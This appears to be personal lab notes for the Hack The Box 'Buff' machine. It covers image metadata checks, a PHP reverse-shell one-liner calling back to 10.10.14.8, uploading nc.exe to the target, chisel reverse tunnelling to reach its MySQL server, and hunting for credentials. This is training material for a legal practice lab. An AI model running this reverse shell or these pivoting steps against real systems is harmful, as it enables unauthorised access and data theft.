Comment on page

HTB buff notes

HTTP tips 
when you see images, try downloading them and analyze the meta data.
wget image_URL`
exiftool image.img
check the modification time 
​
php -r '$sock=fsockopen("10.10.14.8",81);exec("/bin/sh -i <&3 >&3 2>&3");'


​
Powershell command 
​
get-content -shows what the file does 
tasklist - shows all the programs 
​
​
Upload nc.exe on the victim
nc.exe -zv localhost 8888
(talks to the server) 
​
using chisel to interact with SQL server on Windows target
GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP
GitHub
​
​https://github.com/jpillora/chisel/releases​
1.Download both linux and windows 64 versions gz 
2.gunzip them and rename them to whatever you want.  
3.Transfer the windows target machine (the windows file) 
4.On Kali, gunzip the linux file and chmd +x it. start it with (if an error happens, the port is in use)
 ./chisel server --reverse --port 9002
1.On windows,  
.\chisel.exe client IP:9002 R:3306:localhost:3306 
Now that the tunneling is set up, we can connect to the sql serve via local host:3306
On kali, 
nc localhost 3306 
You do want to have mySQL credentials before connecting.
mysQL password 
look into /include for passwords 
​
Login to the SQL server! 
​
mysql -u root -p (no pass) -h 127.0.0.1
​
-> show databases; 
use table_name;  #shows columns 
​
(you can make sure you're connected via chisel by "ss -lnpt | grep 3306") 

HTB Secnotes -SQL injection & CSRF

THM Offensive Security Path

Last modified 1yr ago